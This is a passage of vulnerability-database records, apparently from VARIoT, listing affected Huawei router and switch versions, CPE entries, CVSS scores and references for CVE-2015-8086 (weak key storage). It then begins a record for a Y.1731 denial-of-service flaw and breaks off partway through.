            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "ar",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "quidway s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "ar",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar router",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r007c00spc100",
         },
         {
            model: "quidway s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "quidway s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s12700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r008c00spc500",
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r007c00spc500",
         },
         {
            model: "s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "ar routers",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r006c00spc500",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r005c00spc300",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r006c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r005c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r002c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r001c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300li v200r006c00spc500",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c00spc500",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r002c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r006c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r005c00",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300 v200r003c00spc500",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300 v200r003c00spc300",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300 v200r002c00spc100",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5300 v200r001c00spc300",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r005c30",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r005c20",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r005c10",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r003",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r002",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r001",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r007c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r007c00",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r008c00spc500",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300 v200r009c00",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5300 v200r007c00",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar v200r007c00spc100",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "BID",
            id: "76897",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
         {
            db: "NVD",
            id: "CVE-2015-8086",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201511-337",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s5300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:quidway_s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:quidway_s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r005c20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r005c30:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r003:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r005c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar_firmware:v200r002:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r005c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r006c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2015-8086",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The vendor reported this issue.",
      sources: [
         {
            db: "BID",
            id: "76897",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2015-8086",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8,
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:S/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "Single",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4,
                  confidentialityImpact: "Partial",
                  exploitabilityScore: null,
                  id: "CVE-2015-8086",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:S/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "NONE",
                  baseScore: 5,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 10,
                  id: "CNVD-2015-07446",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8,
                  id: "VHN-86047",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:S/C:P/I:N/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.9,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 1.2,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "HIGH",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.9,
                  baseSeverity: "Medium",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2015-8086",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "High",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2015-8086",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2015-07446",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201511-337",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-86047",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "VULHUB",
            id: "VHN-86047",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
         {
            db: "NVD",
            id: "CVE-2015-8086",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201511-337",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei AR routers with software before V200R007C00SPC100; Quidway S9300 routers with software before V200R009C00; S12700 routers with software before V200R008C00SPC500; S9300, Quidway S5300, and S5300 routers with software before V200R007C00; and S5700 routers with software before V200R007C00SPC500 makes it easier for remote authenticated administrators to obtain encryption keys and ciphertext passwords via vectors related to key storage. plural Huawei There is a vulnerability in the product software that allows the encryption key and ciphertext password to be obtained. Supplementary information : CWE Vulnerability type by CWE-326: Inadequate Encryption Strength ( Incorrect cipher strength ) Has been identified. Huawei AR Routers is an AR series router product from China Huawei. An information disclosure vulnerability exists in Huawei AR Routers. An attacker could exploit this vulnerability to obtain sensitive information. Huawei AR, etc. are routing switches of China Huawei (Huawei). Remote attackers can use the keystore to exploit this vulnerability to gain administrator privileges and crack hard-coded keys and ciphertext passwords. The following products and versions are affected: Huawei AR V200R001 , V200R002 , V200R003 , V200R005C10 , V200R005C20 , V200R005C30 ; Quidway S9300 V200R003C00SPC500 , V200R002C00SPC100 , V200R001C00SPC300 ; S12700 V200R006C00 , V200R005C00 ; S9300 V200R006C00SPC500 , V200R005C00SPC300 ; Quidway S5300 V200R001C00SPC300 ",
      sources: [
         {
            db: "NVD",
            id: "CVE-2015-8086",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "BID",
            id: "76897",
         },
         {
            db: "VULHUB",
            id: "VHN-86047",
         },
      ],
      trust: 2.52,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2015-8086",
            trust: 3.4,
         },
         {
            db: "BID",
            id: "76897",
            trust: 2.6,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007262",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201511-337",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-86047",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "VULHUB",
            id: "VHN-86047",
         },
         {
            db: "BID",
            id: "76897",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
         {
            db: "NVD",
            id: "CVE-2015-8086",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201511-337",
         },
      ],
   },
   id: "VAR-201610-0307",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "VULHUB",
            id: "VHN-86047",
         },
      ],
      trust: 1.4761443282352942,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
      ],
   },
   last_update_date: "2023-12-18T12:51:29.977000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Huawei-SA-20150930-01-Routers",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-326",
            trust: 1.1,
         },
         {
            problemtype: "CWE-Other",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-86047",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
         {
            db: "NVD",
            id: "CVE-2015-8086",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.3,
            url: "http://www.securityfocus.com/bid/76897",
         },
         {
            trust: 1.7,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-455876",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8086",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-8086",
         },
         {
            trust: 0.3,
            url: "http://www.huawei.com",
         },
         {
            trust: 0.3,
            url: "http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-455876.htm",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "VULHUB",
            id: "VHN-86047",
         },
         {
            db: "BID",
            id: "76897",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
         {
            db: "NVD",
            id: "CVE-2015-8086",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201511-337",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            db: "VULHUB",
            id: "VHN-86047",
         },
         {
            db: "BID",
            id: "76897",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
         {
            db: "NVD",
            id: "CVE-2015-8086",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201511-337",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2015-11-12T00:00:00",
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            date: "2016-10-03T00:00:00",
            db: "VULHUB",
            id: "VHN-86047",
         },
         {
            date: "2015-09-30T00:00:00",
            db: "BID",
            id: "76897",
         },
         {
            date: "2016-10-06T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
         {
            date: "2016-10-03T21:59:04.893000",
            db: "NVD",
            id: "CVE-2015-8086",
         },
         {
            date: "2015-09-30T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201511-337",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2015-11-24T00:00:00",
            db: "CNVD",
            id: "CNVD-2015-07446",
         },
         {
            date: "2016-11-28T00:00:00",
            db: "VULHUB",
            id: "VHN-86047",
         },
         {
            date: "2016-09-19T17:00:00",
            db: "BID",
            id: "76897",
         },
         {
            date: "2016-10-06T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
         {
            date: "2016-11-28T19:46:02.077000",
            db: "NVD",
            id: "CVE-2015-8086",
         },
         {
            date: "2016-10-09T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201511-337",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201511-337",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Vulnerability in obtaining encryption key and ciphertext password in product software",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2015-007262",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "information disclosure",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201511-337",
         },
      ],
      trust: 0.6,
   },
}

var-201704-0437
Vulnerability from variot

Huawei S9300 with software before V100R006SPH013 and S2300,S3300,S5300,S6300 with software before V100R006SPH010 support Y.1731 and therefore have the Y.1731 vulnerability in processing special packets. The vulnerability causes the restart of switches. plural Huawei The product contains a data processing vulnerability.Denial of service (DoS) An attack could be made. The S9300, S2300, S3300, S5300, and S6300 are various types of switches introduced by Huawei. An attacker could exploit this vulnerability to reboot the device. The following products and versions are affected: Huawei S9300 V100R006C00SPC500 Version, V100R006C00SPC800 Version; S2300 V100R006C00SPC800 Version, V100R006C01SPC100 Version, V100R006C03 Version; S3300 V100R006C00SPC800 Version, V100R006C01SPC100 Version, V100R006C03 Version; S5300 V100R006C00SPC800 Version, V100R006C01SPC100 Version, V100R006C03 Version; S6300 V100R006C00SPC800 Version, V100R006C01SPC100 The version is V100R006C03

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0437",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
